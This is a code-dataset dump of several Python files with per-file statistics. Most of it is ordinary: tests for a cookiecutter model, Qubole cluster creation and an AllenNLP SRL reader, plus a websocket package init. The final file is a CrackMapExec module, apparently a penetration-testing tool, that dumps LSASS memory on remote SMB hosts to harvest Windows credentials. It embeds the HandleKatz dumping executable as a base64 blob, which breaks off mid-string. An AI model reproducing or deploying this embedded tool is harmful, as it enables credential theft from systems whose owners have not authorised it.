| 15.25 | 36 | 0.852459 | 8 | 61 | 6.5 | 0.625 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114754 | 61 | 3 | 37 | 20.333333 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e04ef9631d3f76955c5c752ac88943d22503ef3f | 135 | py | Python | default/{{cookiecutter.project_short_name}}/tests/test_model.py | timtroendle/cookiecutter-reproducible-science | 6f59375e6bbe025bb46ddc8c6b16c348b649a8ed | [
"MIT"
] | 9 | 2018-12-20T22:02:37.000Z | 2022-02-20T19:27:53.000Z | default/{{cookiecutter.project_short_name}}/tests/test_model.py | timtroendle/cookiecutter-reproducible-science | 6f59375e6bbe025bb46ddc8c6b16c348b649a8ed | [
"MIT"
] | 4 | 2020-10-12T07:47:08.000Z | 2021-05-27T08:10:10.000Z | default/{{cookiecutter.project_short_name}}/tests/test_model.py | timtroendle/cookiecutter-reproducible-science | 6f59375e6bbe025bb46ddc8c6b16c348b649a8ed | [
"MIT"
] | null | null | null | """Test case for the model."""
import scripts.model
def test_model():
assert scripts.model.linear_model(slope=1, x0=4, x=0) == 4
| 19.285714 | 62 | 0.681481 | 23 | 135 | 3.913043 | 0.695652 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04386 | 0.155556 | 135 | 6 | 63 | 22.5 | 0.745614 | 0.177778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e05128dd3aa67e7284d319b7bda8bfde7c03f3c9 | 12,789 | py | Python | tests/test_clusterv22.py | aditya-dhage/qds-sdk-py | b84036e3b666065cb1832d590d38863d0bfeee30 | [
"Apache-2.0"
] | null | null | null | tests/test_clusterv22.py | aditya-dhage/qds-sdk-py | b84036e3b666065cb1832d590d38863d0bfeee30 | [
"Apache-2.0"
] | null | null | null | tests/test_clusterv22.py | aditya-dhage/qds-sdk-py | b84036e3b666065cb1832d590d38863d0bfeee30 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import sys
import os
if sys.version_info > (2, 7, 0):
import unittest
else:
import unittest2 as unittest
from mock import Mock, ANY
import tempfile
sys.path.append(os.path.join(os.path.dirname(__file__), '../bin'))
import qds
from qds_sdk.connection import Connection
from test_base import print_command
from test_base import QdsCliTestCase
from qds_sdk.cloud.cloud import Cloud
from qds_sdk.qubole import Qubole
class TestClusterCreate(QdsCliTestCase):
# default cluster composition
def test_cluster_info(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--compute-access-key', 'aki', '--compute-secret-key', 'sak', '--min-nodes', '3',
'--max-nodes', '5', '--disallow-cluster-termination', '--enable-ganglia-monitoring',
'--node-bootstrap-file', 'test_file_name', '--master-instance-type',
'm1.xlarge', '--slave-instance-type', 'm1.large', '--encrypted-ephemerals']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {
'cloud_config': {'compute_config': {'compute_secret_key': 'sak', 'compute_access_key': 'aki'}},
'monitoring': {'ganglia': True},
'cluster_info': {'master_instance_type': 'm1.xlarge', 'node_bootstrap': 'test_file_name',
'slave_instance_type': 'm1.large', 'label': ['test_label'],
'disallow_cluster_termination': True, 'max_nodes': 5, 'min_nodes': 3,
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'autoscaling_nodes': {'nodes': [{'percentage': 50, 'type': 'ondemand'},
{'timeout_for_request': 1,
'percentage': 50, 'type': 'spot',
'fallback': 'ondemand',
'maximum_bid_price_percentage': 100}]}},
'datadisk': {'encryption': True}}})
def test_od_od_od(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-ondemand-percentage', '100']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'autoscaling_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}},
'label': ['test_label']}})
def test_od_od_odspot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-ondemand-percentage',
'50', '--autoscaling-spot-percentage', '50', '--autoscaling-maximum-bid-price-percentage', '50',
'--autoscaling-timeout-for-request', '3', '--autoscaling-spot-fallback', 'ondemand']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'percentage': 50, 'type': 'ondemand'},
{'timeout_for_request': 3, 'percentage': 50, 'type': 'spot', 'fallback': 'ondemand',
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_od_odspot_nofallback(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-ondemand-percentage',
'50', '--autoscaling-spot-percentage', '50', '--autoscaling-maximum-bid-price-percentage', '50',
'--autoscaling-timeout-for-request', '3', '--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'percentage': 50, 'type': 'ondemand'},
{'timeout_for_request': 3, 'percentage': 50, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_od_spotblock(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-spot-block-percentage',
'100', '--autoscaling-spot-block-duration', '60']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'autoscaling_nodes': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]}},
'label': ['test_label']}})
def test_od_od_spotblockspot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-spot-block-percentage',
'50', '--autoscaling-spot-block-duration', '60', '--autoscaling-spot-percentage', '50',
'--autoscaling-maximum-bid-price-percentage', '50',
'--autoscaling-timeout-for-request', '3', '--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'percentage': 50, 'type': 'spotblock', 'timeout': 60},
{'timeout_for_request': 3, 'percentage': 50, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_od_spot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100', '--autoscaling-spot-percentage',
'100',
'--autoscaling-maximum-bid-price-percentage', '50', '--autoscaling-timeout-for-request', '3',
'--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_spot_spot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-spot-percentage', '100',
'--min-maximum-bid-price-percentage', '50', '--min-timeout-for-request', '3',
'--min-spot-fallback', None, '--autoscaling-spot-percentage', '100',
'--autoscaling-maximum-bid-price-percentage', '50', '--autoscaling-timeout-for-request', '3',
'--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {'composition': {'min_nodes': {
'nodes': [{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}, 'master': {
'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {'nodes': [
{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_spotblock_spotblock_spotblock(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'spotblock', '--master-spot-block-duration', '60', '--min-spot-block-percentage',
'100', '--min-spot-block-duration', '60', '--autoscaling-spot-block-percentage',
'100', '--autoscaling-spot-block-duration', '60']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]},
'master': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]},
'autoscaling_nodes': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]}},
'label': ['test_label']}})
def test_spot_spot_spot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'spot', '--master-maximum-bid-price-percentage', '50',
'--master-timeout-for-request', '3',
'--master-spot-fallback', None, '--min-spot-percentage', '100',
'--min-maximum-bid-price-percentage', '50', '--min-timeout-for-request', '3',
'--min-spot-fallback', None, '--autoscaling-spot-percentage', '100',
'--autoscaling-maximum-bid-price-percentage', '50', '--autoscaling-timeout-for-request', '3',
'--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {'composition': {'min_nodes': {
'nodes': [{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}, 'master': {'nodes': [
{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}, 'autoscaling_nodes': {'nodes': [
{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
| 64.590909 | 119 | 0.533505 | 1,221 | 12,789 | 5.387387 | 0.091728 | 0.083004 | 0.067194 | 0.06689 | 0.849194 | 0.831408 | 0.819398 | 0.812709 | 0.804348 | 0.804348 | 0 | 0.028177 | 0.275706 | 12,789 | 197 | 120 | 64.918782 | 0.68196 | 0.002111 | 0 | 0.650273 | 0 | 0 | 0.403527 | 0.158072 | 0 | 0 | 0 | 0 | 0.054645 | 1 | 0.054645 | false | 0 | 0.071038 | 0 | 0.131148 | 0.065574 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e052b4251c3258e4a63d87436c9ee50db2657848 | 150 | py | Python | WeboscketWrapper_JE/je_websocket/webscoket_core/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 2 | 2020-11-27T07:18:23.000Z | 2020-12-30T06:37:21.000Z | WeboscketWrapper_JE/je_websocket/webscoket_core/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 2 | 2020-11-27T17:19:35.000Z | 2020-11-27T20:29:37.000Z | WeboscketWrapper_JE/je_websocket/webscoket_core/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | from je_websocket.webscoket_core.websocket_client import websocket_client
from je_websocket.webscoket_core.websocket_server import websocket_server
| 50 | 74 | 0.906667 | 20 | 150 | 6.4 | 0.4 | 0.09375 | 0.234375 | 0.375 | 0.578125 | 0.578125 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 150 | 2 | 75 | 75 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1623394ad6069c4b30a16a2cf9c147aafb3b9e12 | 4,235 | py | Python | allennlp/tests/data/dataset_readers/srl_dataset_reader_test.py | schmmd/allennlp | fbc28cefe03b1ea3ff65300d475d34f5f9629a5c | [
"Apache-2.0"
] | 17 | 2019-11-19T19:02:35.000Z | 2021-11-16T16:19:07.000Z | allennlp/tests/data/dataset_readers/srl_dataset_reader_test.py | schmmd/allennlp | fbc28cefe03b1ea3ff65300d475d34f5f9629a5c | [
"Apache-2.0"
] | 1 | 2021-05-31T11:12:02.000Z | 2021-06-01T05:34:27.000Z | allennlp/tests/data/dataset_readers/srl_dataset_reader_test.py | schmmd/allennlp | fbc28cefe03b1ea3ff65300d475d34f5f9629a5c | [
"Apache-2.0"
] | 10 | 2019-12-06T11:32:37.000Z | 2022-01-06T15:39:09.000Z | # pylint: disable=no-self-use,invalid-name
import pytest

from allennlp.data.dataset_readers.semantic_role_labeling import SrlReader
from allennlp.common.util import ensure_list
from allennlp.common.testing import AllenNlpTestCase


class TestSrlReader:
    @pytest.mark.parametrize("lazy", (True, False))
    def test_read_from_file(self, lazy):
        conll_reader = SrlReader(lazy=lazy)
        instances = conll_reader.read(AllenNlpTestCase.FIXTURES_ROOT / 'conll_2012' / 'subdomain')
        instances = ensure_list(instances)

        fields = instances[0].fields
        tokens = [t.text for t in fields['tokens'].tokens]
        assert tokens == ["Mali", "government", "officials", "say", "the", "woman", "'s",
                          "confession", "was", "forced", "."]
        assert fields["verb_indicator"].labels[3] == 1
        assert fields["tags"].labels == ['B-ARG0', 'I-ARG0', 'I-ARG0', 'B-V', 'B-ARG1',
                                         'I-ARG1', 'I-ARG1', 'I-ARG1', 'I-ARG1', 'I-ARG1', 'O']
        assert fields["metadata"].metadata["words"] == tokens
        assert fields["metadata"].metadata["verb"] == tokens[3]
        assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels

        fields = instances[1].fields
        tokens = [t.text for t in fields['tokens'].tokens]
        assert tokens == ["Mali", "government", "officials", "say", "the", "woman", "'s",
                          "confession", "was", "forced", "."]
        assert fields["verb_indicator"].labels[8] == 1
        assert fields["tags"].labels == ['O', 'O', 'O', 'O', 'B-ARG1', 'I-ARG1',
                                         'I-ARG1', 'I-ARG1', 'B-V', 'B-ARG2', 'O']
        assert fields["metadata"].metadata["words"] == tokens
        assert fields["metadata"].metadata["verb"] == tokens[8]
        assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels

        fields = instances[2].fields
        tokens = [t.text for t in fields['tokens'].tokens]
        assert tokens == ['The', 'prosecution', 'rested', 'its', 'case', 'last', 'month', 'after',
                          'four', 'months', 'of', 'hearings', '.']
        assert fields["verb_indicator"].labels[2] == 1
        assert fields["tags"].labels == ['B-ARG0', 'I-ARG0', 'B-V', 'B-ARG1', 'I-ARG1', 'B-ARGM-TMP',
                                         'I-ARGM-TMP', 'B-ARGM-TMP', 'I-ARGM-TMP', 'I-ARGM-TMP',
                                         'I-ARGM-TMP', 'I-ARGM-TMP', 'O']
        assert fields["metadata"].metadata["words"] == tokens
        assert fields["metadata"].metadata["verb"] == tokens[2]
        assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels

        fields = instances[3].fields
        tokens = [t.text for t in fields['tokens'].tokens]
        assert tokens == ['The', 'prosecution', 'rested', 'its', 'case', 'last', 'month', 'after',
                          'four', 'months', 'of', 'hearings', '.']
        assert fields["verb_indicator"].labels[11] == 1
        assert fields["tags"].labels == ['O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'B-V', 'O']
        assert fields["metadata"].metadata["words"] == tokens
        assert fields["metadata"].metadata["verb"] == tokens[11]
        assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels

        # Tests a sentence with no verbal predicates.
        fields = instances[4].fields
        tokens = [t.text for t in fields['tokens'].tokens]
        assert tokens == ["Denise", "Dillon", "Headline", "News", "."]
        assert fields["verb_indicator"].labels == [0, 0, 0, 0, 0]
        assert fields["tags"].labels == ['O', 'O', 'O', 'O', 'O']
        assert fields["metadata"].metadata["words"] == tokens
        assert fields["metadata"].metadata["verb"] is None
        assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels

    def test_srl_reader_can_filter_by_domain(self):
        conll_reader = SrlReader(domain_identifier="subdomain2")
        instances = conll_reader.read(AllenNlpTestCase.FIXTURES_ROOT / 'conll_2012')
        instances = ensure_list(instances)
        # If we'd included the folder, we'd have 9 instances.
        assert len(instances) == 2
| 55.723684 | 107 | 0.568123 | 496 | 4,235 | 4.782258 | 0.241935 | 0.126476 | 0.126476 | 0.177066 | 0.733558 | 0.720067 | 0.712901 | 0.712901 | 0.704469 | 0.528668 | 0 | 0.016506 | 0.241795 | 4,235 | 75 | 108 | 56.466667 | 0.722205 | 0.032113 | 0 | 0.396825 | 0 | 0 | 0.211966 | 0 | 0 | 0 | 0 | 0 | 0.492063 | 1 | 0.031746 | false | 0 | 0.063492 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
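Each file record in this dump is followed by a pipe-separated row of quality signals in the column order given by the header (`hexsha | size | ext | lang | ...`). As a minimal sketch of how such a row can be split back into fields, assuming the helper name `parse_signal_row` (hypothetical, not part of any record above):

```python
def parse_signal_row(row: str) -> list[str]:
    # Hypothetical helper: split one ' | '-separated quality-signal row
    # from this dump into stripped string fields; numeric columns stay
    # strings here and can be cast by the caller as needed.
    return [field.strip() for field in row.split("|")]


# Shortened example row in the header's leading column order:
# hexsha | size | ext | lang
fields = parse_signal_row("e052b4251c3258e4a63d87436c9ee50db2657848 | 150 | py | Python")
print(fields)
```

Rows whose content field itself contains `|` characters would need a stricter parser; this sketch only covers the plain metadata rows.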
1659ca2dd53d1ac61a5723336e462a72726f252d | 89,237 | py | Python | cme/modules/handlekatz.py | justinforbes/CrackMapExec | 7b8473a82dbf3b5268f80451ff516c31fac1eaed | [
"BSD-2-Clause"
] | null | null | null | cme/modules/handlekatz.py | justinforbes/CrackMapExec | 7b8473a82dbf3b5268f80451ff516c31fac1eaed | [
"BSD-2-Clause"
] | null | null | null | cme/modules/handlekatz.py | justinforbes/CrackMapExec | 7b8473a82dbf3b5268f80451ff516c31fac1eaed | [
"BSD-2-Clause"
] | null | null | null | # handlekatz module for CME python3
# author of the module: github.com/mpgn
# HandleKatz: https://github.com/codewhitesec/HandleKatz

from io import StringIO
import os
import sys
import re
import time
import base64


class CMEModule:

    name = 'handlekatz'
    description = "Get an LSASS dump using handlekatz64 and parse the result with pypykatz"
    supported_protocols = ['smb']
    opsec_safe = True  # not really
    multiple_hosts = True

    def options(self, context, module_options):
        '''
        TMP_DIR              Path where the process dump should be saved on the target system (default: C:\\Windows\\Temp\\)
        HANDLEKATZ_PATH      Path where handlekatz.exe is located on your system (default: /tmp/shared/)
        HANDLEKATZ_EXE_NAME  Name of the handlekatz executable (default: handlekatz.exe)
        DIR_RESULT           Location where the dump files are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
        '''
        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.share = "C$"
        self.tmp_share = self.tmp_dir.split(":")[1]
self.handlekatz_embeded = base64.b64decode("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